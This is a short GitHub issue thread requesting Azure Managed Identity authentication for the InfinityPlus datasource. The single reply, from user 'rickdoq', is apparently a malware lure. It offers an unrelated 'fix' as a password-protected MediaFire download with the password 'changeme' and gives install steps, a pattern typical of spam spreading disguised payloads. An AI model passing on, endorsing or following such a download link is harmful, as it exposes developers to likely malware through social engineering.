### ISSUE TITLE
Implement Azure Managed Identity Authentication

### ISSUE THREAD

**Issue by dkryuchkov** [cloudrhinoltd/infinity-plus-datasource#6]
Add support for Azure Managed Identity (MSI) authentication in InfinityPlus Datasource to enhance security and streamline cloud integrations.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
